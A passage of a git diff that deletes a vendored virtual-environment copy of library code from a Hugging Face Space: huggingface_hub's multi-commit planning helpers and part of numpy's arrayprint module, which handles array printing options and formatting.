Learn more about multi-commits [in this guide](https://huggingface.co/docs/huggingface_hub/main/guides/upload)._ -""" - -MULTI_COMMIT_PR_CLOSE_COMMENT_FAILURE_NO_CHANGES_TEMPLATE = """ -Cannot merge Pull Requests as no changes are associated. This PR will be closed automatically. - -_This is a comment posted using the `huggingface_hub` library in the context of a multi-commit. Learn more about multi-commits [in this guide](https://huggingface.co/docs/huggingface_hub/main/guides/upload)._ -""" - -MULTI_COMMIT_PR_CLOSE_COMMENT_FAILURE_BAD_REQUEST_TEMPLATE = """ -An error occurred while trying to merge the Pull Request: `{error_message}`. - -_This is a comment posted using the `huggingface_hub` library in the context of a multi-commit. Learn more about multi-commits [in this guide](https://huggingface.co/docs/huggingface_hub/main/guides/upload)._ -""" - - -STEP_ID_REGEX = re.compile(r"- \[(?P[ |x])\].*(?P[a-fA-F0-9]{64})", flags=re.MULTILINE) - - -@experimental -def plan_multi_commits( - operations: Iterable[Union[CommitOperationAdd, CommitOperationDelete]], - max_operations_per_commit: int = 50, - max_upload_size_per_commit: int = 2 * 1024 * 1024 * 1024, -) -> Tuple[List[List[CommitOperationAdd]], List[List[CommitOperationDelete]]]: - """Split a list of operations in a list of commits to perform. - - Implementation follows a sub-optimal (yet simple) algorithm: - 1. Delete operations are grouped together by commits of maximum `max_operations_per_commits` operations. - 2. All additions exceeding `max_upload_size_per_commit` are committed 1 by 1. - 3. All remaining additions are grouped together and split each time the `max_operations_per_commit` or the - `max_upload_size_per_commit` limit is reached. - - We do not try to optimize the splitting to get the lowest number of commits as this is a NP-hard problem (see - [bin packing problem](https://en.wikipedia.org/wiki/Bin_packing_problem)). 
For our use case, it is not problematic - to use a sub-optimal solution so we favored an easy-to-explain implementation. - - Args: - operations (`List` of [`~hf_api.CommitOperation`]): - The list of operations to split into commits. - max_operations_per_commit (`int`): - Maximum number of operations in a single commit. Defaults to 50. - max_upload_size_per_commit (`int`): - Maximum size to upload (in bytes) in a single commit. Defaults to 2GB. Files bigger than this limit are - uploaded, 1 per commit. - - Returns: - `Tuple[List[List[CommitOperationAdd]], List[List[CommitOperationDelete]]]`: a tuple. First item is a list of - lists of [`CommitOperationAdd`] representing the addition commits to push. The second item is a list of lists - of [`CommitOperationDelete`] representing the deletion commits. - - - - `plan_multi_commits` is experimental. Its API and behavior is subject to change in the future without prior notice. - - - - Example: - ```python - >>> from huggingface_hub import HfApi, plan_multi_commits - >>> addition_commits, deletion_commits = plan_multi_commits( - ... operations=[ - ... CommitOperationAdd(...), - ... CommitOperationAdd(...), - ... CommitOperationDelete(...), - ... CommitOperationDelete(...), - ... CommitOperationAdd(...), - ... ], - ... ) - >>> HfApi().create_commits_on_pr( - ... repo_id="my-cool-model", - ... addition_commits=addition_commits, - ... deletion_commits=deletion_commits, - ... (...) - ... verbose=True, - ... ) - ``` - - - - The initial order of the operations is not guaranteed! All deletions will be performed before additions. If you are - not updating multiple times the same file, you are fine. 
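The greedy plan described above (batch deletions by count, isolate oversized additions, pack the remaining additions until either the operation-count or upload-size limit trips) can be sketched without any `huggingface_hub` dependency. `Op` below is a hypothetical stand-in for `CommitOperationAdd`/`CommitOperationDelete`, not the library's classes:

```python
from typing import List, NamedTuple

class Op(NamedTuple):
    """Hypothetical stand-in for a commit operation."""
    path: str
    size: int = 0          # upload size in bytes (ignored for deletions)
    is_delete: bool = False

def plan_commits(ops, max_ops=50, max_size=2 * 1024**3):
    """Greedy split: deletions batched by count, oversized files isolated,
    remaining additions grouped until either limit is reached."""
    add_commits: List[List[Op]] = []
    del_commits: List[List[Op]] = []
    adds: List[Op] = []
    adds_size = 0
    dels: List[Op] = []
    for op in ops:
        if op.is_delete:
            dels.append(op)
            if len(dels) >= max_ops:
                del_commits.append(dels)
                dels = []
        elif op.size >= max_size:
            add_commits.append([op])   # oversized file: committed on its own
        elif adds_size + op.size < max_size:
            adds.append(op)
            adds_size += op.size
        else:
            add_commits.append(adds)   # size limit tripped: flush, start a new batch
            adds, adds_size = [op], op.size
        if len(adds) >= max_ops:
            add_commits.append(adds)   # count limit tripped
            adds, adds_size = [], 0
    if adds:
        add_commits.append(adds)
    if dels:
        del_commits.append(dels)
    return add_commits, del_commits
```

As in the real `plan_multi_commits`, the split makes no attempt to be optimal (bin packing is NP-hard); it only guarantees that no single commit exceeds either limit.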
- - - """ - addition_commits: List[List[CommitOperationAdd]] = [] - deletion_commits: List[List[CommitOperationDelete]] = [] - - additions: List[CommitOperationAdd] = [] - additions_size = 0 - deletions: List[CommitOperationDelete] = [] - for op in operations: - if isinstance(op, CommitOperationDelete): - # Group delete operations together - deletions.append(op) - if len(deletions) >= max_operations_per_commit: - deletion_commits.append(deletions) - deletions = [] - - elif op.upload_info.size >= max_upload_size_per_commit: - # Upload huge files 1 by 1 - addition_commits.append([op]) - - elif additions_size + op.upload_info.size < max_upload_size_per_commit: - # Group other additions and split if size limit is reached (either max_nb_files or max_upload_size) - additions.append(op) - additions_size += op.upload_info.size - - else: - addition_commits.append(additions) - additions = [op] - additions_size = op.upload_info.size - - if len(additions) >= max_operations_per_commit: - addition_commits.append(additions) - additions = [] - additions_size = 0 - - if len(additions) > 0: - addition_commits.append(additions) - if len(deletions) > 0: - deletion_commits.append(deletions) - - return addition_commits, deletion_commits - - -@dataclass -class MultiCommitStep: - """Dataclass containing a list of CommitOperation to commit at once. - - A [`MultiCommitStep`] is one atomic part of a [`MultiCommitStrategy`]. Each step is identified by its own - deterministic ID based on the list of commit operations (hexadecimal sha256). ID is persistent between re-runs if - the list of commits is kept the same. 
-    """
-
-    operations: List[Union[CommitOperationAdd, CommitOperationDelete]]
-
-    id: str = field(init=False)
-    completed: bool = False
-
-    def __post_init__(self) -> None:
-        if len(self.operations) == 0:
-            raise ValueError("A MultiCommitStep must have at least 1 commit operation, got 0.")
-
-        # Generate commit id
-        sha = sha256()
-        for op in self.operations:
-            if isinstance(op, CommitOperationAdd):
-                sha.update(b"ADD")
-                sha.update(op.path_in_repo.encode())
-                sha.update(op.upload_info.sha256)
-            elif isinstance(op, CommitOperationDelete):
-                sha.update(b"DELETE")
-                sha.update(op.path_in_repo.encode())
-                sha.update(str(op.is_folder).encode())
-            else:
-                raise NotImplementedError()
-        self.id = sha.hexdigest()
-
-    def __str__(self) -> str:
-        """Format a step for PR description.
-
-        Formatting can be changed in the future as long as it is single line, starts with `- [ ]`/`- [x]` and contains
-        `self.id`. Must be able to match `STEP_ID_REGEX`.
-        """
-        additions = [op for op in self.operations if isinstance(op, CommitOperationAdd)]
-        file_deletions = [op for op in self.operations if isinstance(op, CommitOperationDelete) and not op.is_folder]
-        folder_deletions = [op for op in self.operations if isinstance(op, CommitOperationDelete) and op.is_folder]
-        if len(additions) > 0:
-            return (
-                f"- [{'x' if self.completed else ' '}] Upload {len(additions)} file(s) "
-                f"totalling {_format_size(sum(add.upload_info.size for add in additions))}"
-                f" ({self.id})"
-            )
-        else:
-            return (
-                f"- [{'x' if self.completed else ' '}] Delete {len(file_deletions)} file(s) and"
-                f" {len(folder_deletions)} folder(s) ({self.id})"
-            )
-
-
-@dataclass
-class MultiCommitStrategy:
-    """Dataclass containing a list of [`MultiCommitStep`] to commit iteratively.
-
-    A strategy is identified by its own deterministic ID based on the list of its steps (hexadecimal sha256). ID is
-    persistent between re-runs if the list of commits is kept the same.
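The deterministic step ID above is a sha256 over the ordered operation descriptors, so the same plan hashes to the same ID across re-runs. A minimal sketch of that idea; the `(kind, path, payload)` tuples are illustrative, not the library's exact byte layout:

```python
from hashlib import sha256

def step_id(operations):
    """Deterministic step ID: sha256 over the ordered operation descriptors.

    Same operations in the same order -> same hex digest, so a step can be
    matched against the checkboxes of an existing PR description on re-run.
    """
    sha = sha256()
    for kind, path, payload in operations:
        sha.update(kind.encode())   # e.g. "ADD" or "DELETE"
        sha.update(path.encode())   # path in the repo
        sha.update(payload)         # content sha256 for adds, b"True"/b"False" for deletes
    return sha.hexdigest()
```

Note that the digest is order-sensitive: reordering the operations yields a different ID, which is exactly what makes re-runs of an identical plan recognizable.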
-    """
-
-    addition_commits: List[MultiCommitStep]
-    deletion_commits: List[MultiCommitStep]
-
-    id: str = field(init=False)
-    all_steps: Set[str] = field(init=False)
-
-    def __post_init__(self) -> None:
-        self.all_steps = {step.id for step in self.addition_commits + self.deletion_commits}
-        if len(self.all_steps) < len(self.addition_commits) + len(self.deletion_commits):
-            raise ValueError("Got duplicate commits in MultiCommitStrategy. All commits must be unique.")
-
-        if len(self.all_steps) == 0:
-            raise ValueError("A MultiCommitStrategy must have at least 1 commit, got 0.")
-
-        # Generate strategy id
-        sha = sha256()
-        for step in self.addition_commits + self.deletion_commits:
-            sha.update("new step".encode())
-            sha.update(step.id.encode())
-        self.id = sha.hexdigest()
-
-
-def multi_commit_create_pull_request(
-    api: "HfApi",
-    repo_id: str,
-    commit_message: str,
-    commit_description: Optional[str],
-    strategy: MultiCommitStrategy,
-    token: Optional[str],
-    repo_type: Optional[str],
-) -> DiscussionWithDetails:
-    return api.create_pull_request(
-        repo_id=repo_id,
-        title=f"[WIP] {commit_message} (multi-commit {strategy.id})",
-        description=multi_commit_generate_comment(
-            commit_message=commit_message, commit_description=commit_description, strategy=strategy
-        ),
-        token=token,
-        repo_type=repo_type,
-    )
-
-
-def multi_commit_generate_comment(
-    commit_message: str,
-    commit_description: Optional[str],
-    strategy: MultiCommitStrategy,
-) -> str:
-    return MULTI_COMMIT_PR_DESCRIPTION_TEMPLATE.format(
-        commit_message=commit_message,
-        commit_description=commit_description or "",
-        multi_commit_id=strategy.id,
-        multi_commit_strategy="\n".join(
-            str(commit) for commit in strategy.deletion_commits + strategy.addition_commits
-        ),
-    )
-
-
-def multi_commit_parse_pr_description(description: str) -> Set[str]:
-    return {match[1] for match in STEP_ID_REGEX.findall(description)}
diff --git
a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/core/arrayprint.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/core/arrayprint.py deleted file mode 100644 index 62cd527073a615458b12619545f4da76664c4bc0..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/numpy/core/arrayprint.py +++ /dev/null @@ -1,1725 +0,0 @@ -"""Array printing function - -$Id: arrayprint.py,v 1.9 2005/09/13 13:58:44 teoliphant Exp $ - -""" -__all__ = ["array2string", "array_str", "array_repr", "set_string_function", - "set_printoptions", "get_printoptions", "printoptions", - "format_float_positional", "format_float_scientific"] -__docformat__ = 'restructuredtext' - -# -# Written by Konrad Hinsen -# last revision: 1996-3-13 -# modified by Jim Hugunin 1997-3-3 for repr's and str's (and other details) -# and by Perry Greenfield 2000-4-1 for numarray -# and by Travis Oliphant 2005-8-22 for numpy - - -# Note: Both scalartypes.c.src and arrayprint.py implement strs for numpy -# scalars but for different purposes. scalartypes.c.src has str/reprs for when -# the scalar is printed on its own, while arrayprint.py has strs for when -# scalars are printed inside an ndarray. Only the latter strs are currently -# user-customizable. - -import functools -import numbers -import sys -try: - from _thread import get_ident -except ImportError: - from _dummy_thread import get_ident - -import numpy as np -from . import numerictypes as _nt -from .umath import absolute, isinf, isfinite, isnat -from . 
import multiarray -from .multiarray import (array, dragon4_positional, dragon4_scientific, - datetime_as_string, datetime_data, ndarray, - set_legacy_print_mode) -from .fromnumeric import any -from .numeric import concatenate, asarray, errstate -from .numerictypes import (longlong, intc, int_, float_, complex_, bool_, - flexible) -from .overrides import array_function_dispatch, set_module -import operator -import warnings -import contextlib - -_format_options = { - 'edgeitems': 3, # repr N leading and trailing items of each dimension - 'threshold': 1000, # total items > triggers array summarization - 'floatmode': 'maxprec', - 'precision': 8, # precision of floating point representations - 'suppress': False, # suppress printing small floating values in exp format - 'linewidth': 75, - 'nanstr': 'nan', - 'infstr': 'inf', - 'sign': '-', - 'formatter': None, - # Internally stored as an int to simplify comparisons; converted from/to - # str/False on the way in/out. - 'legacy': sys.maxsize} - -def _make_options_dict(precision=None, threshold=None, edgeitems=None, - linewidth=None, suppress=None, nanstr=None, infstr=None, - sign=None, formatter=None, floatmode=None, legacy=None): - """ - Make a dictionary out of the non-None arguments, plus conversion of - *legacy* and sanity checks. - """ - - options = {k: v for k, v in locals().items() if v is not None} - - if suppress is not None: - options['suppress'] = bool(suppress) - - modes = ['fixed', 'unique', 'maxprec', 'maxprec_equal'] - if floatmode not in modes + [None]: - raise ValueError("floatmode option must be one of " + - ", ".join('"{}"'.format(m) for m in modes)) - - if sign not in [None, '-', '+', ' ']: - raise ValueError("sign option must be one of ' ', '+', or '-'") - - if legacy == False: - options['legacy'] = sys.maxsize - elif legacy == '1.13': - options['legacy'] = 113 - elif legacy == '1.21': - options['legacy'] = 121 - elif legacy is None: - pass # OK, do nothing. 
- else: - warnings.warn( - "legacy printing option can currently only be '1.13', '1.21', or " - "`False`", stacklevel=3) - - if threshold is not None: - # forbid the bad threshold arg suggested by stack overflow, gh-12351 - if not isinstance(threshold, numbers.Number): - raise TypeError("threshold must be numeric") - if np.isnan(threshold): - raise ValueError("threshold must be non-NAN, try " - "sys.maxsize for untruncated representation") - - if precision is not None: - # forbid the bad precision arg as suggested by issue #18254 - try: - options['precision'] = operator.index(precision) - except TypeError as e: - raise TypeError('precision must be an integer') from e - - return options - - -@set_module('numpy') -def set_printoptions(precision=None, threshold=None, edgeitems=None, - linewidth=None, suppress=None, nanstr=None, infstr=None, - formatter=None, sign=None, floatmode=None, *, legacy=None): - """ - Set printing options. - - These options determine the way floating point numbers, arrays and - other NumPy objects are displayed. - - Parameters - ---------- - precision : int or None, optional - Number of digits of precision for floating point output (default 8). - May be None if `floatmode` is not `fixed`, to print as many digits as - necessary to uniquely specify the value. - threshold : int, optional - Total number of array elements which trigger summarization - rather than full repr (default 1000). - To always use the full repr without summarization, pass `sys.maxsize`. - edgeitems : int, optional - Number of array items in summary at beginning and end of - each dimension (default 3). - linewidth : int, optional - The number of characters per line for the purpose of inserting - line breaks (default 75). - suppress : bool, optional - If True, always print floating point numbers using fixed point - notation, in which case numbers equal to zero in the current precision - will print as zero. 
If False, then scientific notation is used when - absolute value of the smallest number is < 1e-4 or the ratio of the - maximum absolute value to the minimum is > 1e3. The default is False. - nanstr : str, optional - String representation of floating point not-a-number (default nan). - infstr : str, optional - String representation of floating point infinity (default inf). - sign : string, either '-', '+', or ' ', optional - Controls printing of the sign of floating-point types. If '+', always - print the sign of positive values. If ' ', always prints a space - (whitespace character) in the sign position of positive values. If - '-', omit the sign character of positive values. (default '-') - formatter : dict of callables, optional - If not None, the keys should indicate the type(s) that the respective - formatting function applies to. Callables should return a string. - Types that are not specified (by their corresponding keys) are handled - by the default formatters. Individual types for which a formatter - can be set are: - - - 'bool' - - 'int' - - 'timedelta' : a `numpy.timedelta64` - - 'datetime' : a `numpy.datetime64` - - 'float' - - 'longfloat' : 128-bit floats - - 'complexfloat' - - 'longcomplexfloat' : composed of two 128-bit floats - - 'numpystr' : types `numpy.bytes_` and `numpy.str_` - - 'object' : `np.object_` arrays - - Other keys that can be used to set a group of types at once are: - - - 'all' : sets all types - - 'int_kind' : sets 'int' - - 'float_kind' : sets 'float' and 'longfloat' - - 'complex_kind' : sets 'complexfloat' and 'longcomplexfloat' - - 'str_kind' : sets 'numpystr' - floatmode : str, optional - Controls the interpretation of the `precision` option for - floating-point types. Can take the following values - (default maxprec_equal): - - * 'fixed': Always print exactly `precision` fractional digits, - even if this would print more or fewer digits than - necessary to specify the value uniquely. 
- * 'unique': Print the minimum number of fractional digits necessary - to represent each value uniquely. Different elements may - have a different number of digits. The value of the - `precision` option is ignored. - * 'maxprec': Print at most `precision` fractional digits, but if - an element can be uniquely represented with fewer digits - only print it with that many. - * 'maxprec_equal': Print at most `precision` fractional digits, - but if every element in the array can be uniquely - represented with an equal number of fewer digits, use that - many digits for all elements. - legacy : string or `False`, optional - If set to the string `'1.13'` enables 1.13 legacy printing mode. This - approximates numpy 1.13 print output by including a space in the sign - position of floats and different behavior for 0d arrays. This also - enables 1.21 legacy printing mode (described below). - - If set to the string `'1.21'` enables 1.21 legacy printing mode. This - approximates numpy 1.21 print output of complex structured dtypes - by not inserting spaces after commas that separate fields and after - colons. - - If set to `False`, disables legacy mode. - - Unrecognized strings will be ignored with a warning for forward - compatibility. - - .. versionadded:: 1.14.0 - .. versionchanged:: 1.22.0 - - See Also - -------- - get_printoptions, printoptions, set_string_function, array2string - - Notes - ----- - `formatter` is always reset with a call to `set_printoptions`. - - Use `printoptions` as a context manager to set the values temporarily. - - Examples - -------- - Floating point precision can be set: - - >>> np.set_printoptions(precision=4) - >>> np.array([1.123456789]) - [1.1235] - - Long arrays can be summarised: - - >>> np.set_printoptions(threshold=5) - >>> np.arange(10) - array([0, 1, 2, ..., 7, 8, 9]) - - Small results can be suppressed: - - >>> eps = np.finfo(float).eps - >>> x = np.arange(4.) 
- >>> x**2 - (x + eps)**2 - array([-4.9304e-32, -4.4409e-16, 0.0000e+00, 0.0000e+00]) - >>> np.set_printoptions(suppress=True) - >>> x**2 - (x + eps)**2 - array([-0., -0., 0., 0.]) - - A custom formatter can be used to display array elements as desired: - - >>> np.set_printoptions(formatter={'all':lambda x: 'int: '+str(-x)}) - >>> x = np.arange(3) - >>> x - array([int: 0, int: -1, int: -2]) - >>> np.set_printoptions() # formatter gets reset - >>> x - array([0, 1, 2]) - - To put back the default options, you can use: - - >>> np.set_printoptions(edgeitems=3, infstr='inf', - ... linewidth=75, nanstr='nan', precision=8, - ... suppress=False, threshold=1000, formatter=None) - - Also to temporarily override options, use `printoptions` as a context manager: - - >>> with np.printoptions(precision=2, suppress=True, threshold=5): - ... np.linspace(0, 10, 10) - array([ 0. , 1.11, 2.22, ..., 7.78, 8.89, 10. ]) - - """ - opt = _make_options_dict(precision, threshold, edgeitems, linewidth, - suppress, nanstr, infstr, sign, formatter, - floatmode, legacy) - # formatter is always reset - opt['formatter'] = formatter - _format_options.update(opt) - - # set the C variable for legacy mode - if _format_options['legacy'] == 113: - set_legacy_print_mode(113) - # reset the sign option in legacy mode to avoid confusion - _format_options['sign'] = '-' - elif _format_options['legacy'] == 121: - set_legacy_print_mode(121) - elif _format_options['legacy'] == sys.maxsize: - set_legacy_print_mode(0) - - -@set_module('numpy') -def get_printoptions(): - """ - Return the current print options. - - Returns - ------- - print_opts : dict - Dictionary of current print options with keys - - - precision : int - - threshold : int - - edgeitems : int - - linewidth : int - - suppress : bool - - nanstr : str - - infstr : str - - formatter : dict of callables - - sign : str - - For a full description of these options, see `set_printoptions`. 
- - See Also - -------- - set_printoptions, printoptions, set_string_function - - """ - opts = _format_options.copy() - opts['legacy'] = { - 113: '1.13', 121: '1.21', sys.maxsize: False, - }[opts['legacy']] - return opts - - -def _get_legacy_print_mode(): - """Return the legacy print mode as an int.""" - return _format_options['legacy'] - - -@set_module('numpy') -@contextlib.contextmanager -def printoptions(*args, **kwargs): - """Context manager for setting print options. - - Set print options for the scope of the `with` block, and restore the old - options at the end. See `set_printoptions` for the full description of - available options. - - Examples - -------- - - >>> from numpy.testing import assert_equal - >>> with np.printoptions(precision=2): - ... np.array([2.0]) / 3 - array([0.67]) - - The `as`-clause of the `with`-statement gives the current print options: - - >>> with np.printoptions(precision=2) as opts: - ... assert_equal(opts, np.get_printoptions()) - - See Also - -------- - set_printoptions, get_printoptions - - """ - opts = np.get_printoptions() - try: - np.set_printoptions(*args, **kwargs) - yield np.get_printoptions() - finally: - np.set_printoptions(**opts) - - -def _leading_trailing(a, edgeitems, index=()): - """ - Keep only the N-D corners (leading and trailing edges) of an array. - - Should be passed a base-class ndarray, since it makes no guarantees about - preserving subclasses. 
- """ - axis = len(index) - if axis == a.ndim: - return a[index] - - if a.shape[axis] > 2*edgeitems: - return concatenate(( - _leading_trailing(a, edgeitems, index + np.index_exp[ :edgeitems]), - _leading_trailing(a, edgeitems, index + np.index_exp[-edgeitems:]) - ), axis=axis) - else: - return _leading_trailing(a, edgeitems, index + np.index_exp[:]) - - -def _object_format(o): - """ Object arrays containing lists should be printed unambiguously """ - if type(o) is list: - fmt = 'list({!r})' - else: - fmt = '{!r}' - return fmt.format(o) - -def repr_format(x): - return repr(x) - -def str_format(x): - return str(x) - -def _get_formatdict(data, *, precision, floatmode, suppress, sign, legacy, - formatter, **kwargs): - # note: extra arguments in kwargs are ignored - - # wrapped in lambdas to avoid taking a code path with the wrong type of data - formatdict = { - 'bool': lambda: BoolFormat(data), - 'int': lambda: IntegerFormat(data), - 'float': lambda: FloatingFormat( - data, precision, floatmode, suppress, sign, legacy=legacy), - 'longfloat': lambda: FloatingFormat( - data, precision, floatmode, suppress, sign, legacy=legacy), - 'complexfloat': lambda: ComplexFloatingFormat( - data, precision, floatmode, suppress, sign, legacy=legacy), - 'longcomplexfloat': lambda: ComplexFloatingFormat( - data, precision, floatmode, suppress, sign, legacy=legacy), - 'datetime': lambda: DatetimeFormat(data, legacy=legacy), - 'timedelta': lambda: TimedeltaFormat(data), - 'object': lambda: _object_format, - 'void': lambda: str_format, - 'numpystr': lambda: repr_format} - - # we need to wrap values in `formatter` in a lambda, so that the interface - # is the same as the above values. 
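Along a single axis, `_leading_trailing` above keeps only the first and last `edgeitems` entries; the `'...'` summary marker itself is inserted later by `_formatArray`. A one-axis sketch of the same truncation on plain lists, with the marker inlined here purely for visibility:

```python
def leading_trailing(seq, edgeitems):
    """Keep the first and last `edgeitems` entries of a long sequence.

    Note: the real _leading_trailing only slices the corners; the summary
    marker is added later in the printing pipeline. It is inlined here
    so the effect is visible in the return value.
    """
    if len(seq) > 2 * edgeitems:
        return list(seq[:edgeitems]) + ["..."] + list(seq[-edgeitems:])
    return list(seq)
```

Short sequences (length at most `2 * edgeitems`) pass through untruncated, matching the `a.shape[axis] > 2*edgeitems` guard in the recursive version.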
- def indirect(x): - return lambda: x - - if formatter is not None: - fkeys = [k for k in formatter.keys() if formatter[k] is not None] - if 'all' in fkeys: - for key in formatdict.keys(): - formatdict[key] = indirect(formatter['all']) - if 'int_kind' in fkeys: - for key in ['int']: - formatdict[key] = indirect(formatter['int_kind']) - if 'float_kind' in fkeys: - for key in ['float', 'longfloat']: - formatdict[key] = indirect(formatter['float_kind']) - if 'complex_kind' in fkeys: - for key in ['complexfloat', 'longcomplexfloat']: - formatdict[key] = indirect(formatter['complex_kind']) - if 'str_kind' in fkeys: - formatdict['numpystr'] = indirect(formatter['str_kind']) - for key in formatdict.keys(): - if key in fkeys: - formatdict[key] = indirect(formatter[key]) - - return formatdict - -def _get_format_function(data, **options): - """ - find the right formatting function for the dtype_ - """ - dtype_ = data.dtype - dtypeobj = dtype_.type - formatdict = _get_formatdict(data, **options) - if dtypeobj is None: - return formatdict["numpystr"]() - elif issubclass(dtypeobj, _nt.bool_): - return formatdict['bool']() - elif issubclass(dtypeobj, _nt.integer): - if issubclass(dtypeobj, _nt.timedelta64): - return formatdict['timedelta']() - else: - return formatdict['int']() - elif issubclass(dtypeobj, _nt.floating): - if issubclass(dtypeobj, _nt.longfloat): - return formatdict['longfloat']() - else: - return formatdict['float']() - elif issubclass(dtypeobj, _nt.complexfloating): - if issubclass(dtypeobj, _nt.clongfloat): - return formatdict['longcomplexfloat']() - else: - return formatdict['complexfloat']() - elif issubclass(dtypeobj, (_nt.str_, _nt.bytes_)): - return formatdict['numpystr']() - elif issubclass(dtypeobj, _nt.datetime64): - return formatdict['datetime']() - elif issubclass(dtypeobj, _nt.object_): - return formatdict['object']() - elif issubclass(dtypeobj, _nt.void): - if dtype_.names is not None: - return StructuredVoidFormat.from_data(data, **options) - else: 
- return formatdict['void']() - else: - return formatdict['numpystr']() - - -def _recursive_guard(fillvalue='...'): - """ - Like the python 3.2 reprlib.recursive_repr, but forwards *args and **kwargs - - Decorates a function such that if it calls itself with the same first - argument, it returns `fillvalue` instead of recursing. - - Largely copied from reprlib.recursive_repr - """ - - def decorating_function(f): - repr_running = set() - - @functools.wraps(f) - def wrapper(self, *args, **kwargs): - key = id(self), get_ident() - if key in repr_running: - return fillvalue - repr_running.add(key) - try: - return f(self, *args, **kwargs) - finally: - repr_running.discard(key) - - return wrapper - - return decorating_function - - -# gracefully handle recursive calls, when object arrays contain themselves -@_recursive_guard() -def _array2string(a, options, separator=' ', prefix=""): - # The formatter __init__s in _get_format_function cannot deal with - # subclasses yet, and we also need to avoid recursion issues in - # _formatArray with subclasses which return 0d arrays in place of scalars - data = asarray(a) - if a.shape == (): - a = data - - if a.size > options['threshold']: - summary_insert = "..." 
- data = _leading_trailing(data, options['edgeitems']) - else: - summary_insert = "" - - # find the right formatting function for the array - format_function = _get_format_function(data, **options) - - # skip over "[" - next_line_prefix = " " - # skip over array( - next_line_prefix += " "*len(prefix) - - lst = _formatArray(a, format_function, options['linewidth'], - next_line_prefix, separator, options['edgeitems'], - summary_insert, options['legacy']) - return lst - - -def _array2string_dispatcher( - a, max_line_width=None, precision=None, - suppress_small=None, separator=None, prefix=None, - style=None, formatter=None, threshold=None, - edgeitems=None, sign=None, floatmode=None, suffix=None, - *, legacy=None): - return (a,) - - -@array_function_dispatch(_array2string_dispatcher, module='numpy') -def array2string(a, max_line_width=None, precision=None, - suppress_small=None, separator=' ', prefix="", - style=np._NoValue, formatter=None, threshold=None, - edgeitems=None, sign=None, floatmode=None, suffix="", - *, legacy=None): - """ - Return a string representation of an array. - - Parameters - ---------- - a : ndarray - Input array. - max_line_width : int, optional - Inserts newlines if text is longer than `max_line_width`. - Defaults to ``numpy.get_printoptions()['linewidth']``. - precision : int or None, optional - Floating point precision. - Defaults to ``numpy.get_printoptions()['precision']``. - suppress_small : bool, optional - Represent numbers "very close" to zero as zero; default is False. - Very close is defined by precision: if the precision is 8, e.g., - numbers smaller (in absolute value) than 5e-9 are represented as - zero. - Defaults to ``numpy.get_printoptions()['suppress']``. - separator : str, optional - Inserted between elements. - prefix : str, optional - suffix : str, optional - The length of the prefix and suffix strings are used to respectively - align and wrap the output. 
An array is typically printed as:: - - prefix + array2string(a) + suffix - - The output is left-padded by the length of the prefix string, and - wrapping is forced at the column ``max_line_width - len(suffix)``. - It should be noted that the content of prefix and suffix strings are - not included in the output. - style : _NoValue, optional - Has no effect, do not use. - - .. deprecated:: 1.14.0 - formatter : dict of callables, optional - If not None, the keys should indicate the type(s) that the respective - formatting function applies to. Callables should return a string. - Types that are not specified (by their corresponding keys) are handled - by the default formatters. Individual types for which a formatter - can be set are: - - - 'bool' - - 'int' - - 'timedelta' : a `numpy.timedelta64` - - 'datetime' : a `numpy.datetime64` - - 'float' - - 'longfloat' : 128-bit floats - - 'complexfloat' - - 'longcomplexfloat' : composed of two 128-bit floats - - 'void' : type `numpy.void` - - 'numpystr' : types `numpy.bytes_` and `numpy.str_` - - Other keys that can be used to set a group of types at once are: - - - 'all' : sets all types - - 'int_kind' : sets 'int' - - 'float_kind' : sets 'float' and 'longfloat' - - 'complex_kind' : sets 'complexfloat' and 'longcomplexfloat' - - 'str_kind' : sets 'numpystr' - threshold : int, optional - Total number of array elements which trigger summarization - rather than full repr. - Defaults to ``numpy.get_printoptions()['threshold']``. - edgeitems : int, optional - Number of array items in summary at beginning and end of - each dimension. - Defaults to ``numpy.get_printoptions()['edgeitems']``. - sign : string, either '-', '+', or ' ', optional - Controls printing of the sign of floating-point types. If '+', always - print the sign of positive values. If ' ', always prints a space - (whitespace character) in the sign position of positive values. If - '-', omit the sign character of positive values. 
- Defaults to ``numpy.get_printoptions()['sign']``. - floatmode : str, optional - Controls the interpretation of the `precision` option for - floating-point types. - Defaults to ``numpy.get_printoptions()['floatmode']``. - Can take the following values: - - - 'fixed': Always print exactly `precision` fractional digits, - even if this would print more or fewer digits than - necessary to specify the value uniquely. - - 'unique': Print the minimum number of fractional digits necessary - to represent each value uniquely. Different elements may - have a different number of digits. The value of the - `precision` option is ignored. - - 'maxprec': Print at most `precision` fractional digits, but if - an element can be uniquely represented with fewer digits - only print it with that many. - - 'maxprec_equal': Print at most `precision` fractional digits, - but if every element in the array can be uniquely - represented with an equal number of fewer digits, use that - many digits for all elements. - legacy : string or `False`, optional - If set to the string `'1.13'` enables 1.13 legacy printing mode. This - approximates numpy 1.13 print output by including a space in the sign - position of floats and different behavior for 0d arrays. If set to - `False`, disables legacy mode. Unrecognized strings will be ignored - with a warning for forward compatibility. - - .. versionadded:: 1.14.0 - - Returns - ------- - array_str : str - String representation of the array. - - Raises - ------ - TypeError - if a callable in `formatter` does not return a string. - - See Also - -------- - array_str, array_repr, set_printoptions, get_printoptions - - Notes - ----- - If a formatter is specified for a certain type, the `precision` keyword is - ignored for that type. - - This is a very flexible function; `array_repr` and `array_str` are using - `array2string` internally so keywords with the same name should work - identically in all three functions. 
- - Examples - -------- - >>> x = np.array([1e-16,1,2,3]) - >>> np.array2string(x, precision=2, separator=',', - ... suppress_small=True) - '[0.,1.,2.,3.]' - - >>> x = np.arange(3.) - >>> np.array2string(x, formatter={'float_kind':lambda x: "%.2f" % x}) - '[0.00 1.00 2.00]' - - >>> x = np.arange(3) - >>> np.array2string(x, formatter={'int':lambda x: hex(x)}) - '[0x0 0x1 0x2]' - - """ - - overrides = _make_options_dict(precision, threshold, edgeitems, - max_line_width, suppress_small, None, None, - sign, formatter, floatmode, legacy) - options = _format_options.copy() - options.update(overrides) - - if options['legacy'] <= 113: - if style is np._NoValue: - style = repr - - if a.shape == () and a.dtype.names is None: - return style(a.item()) - elif style is not np._NoValue: - # Deprecation 11-9-2017 v1.14 - warnings.warn("'style' argument is deprecated and no longer functional" - " except in 1.13 'legacy' mode", - DeprecationWarning, stacklevel=2) - - if options['legacy'] > 113: - options['linewidth'] -= len(suffix) - - # treat as a null array if any of shape elements == 0 - if a.size == 0: - return "[]" - - return _array2string(a, options, separator, prefix) - - -def _extendLine(s, line, word, line_width, 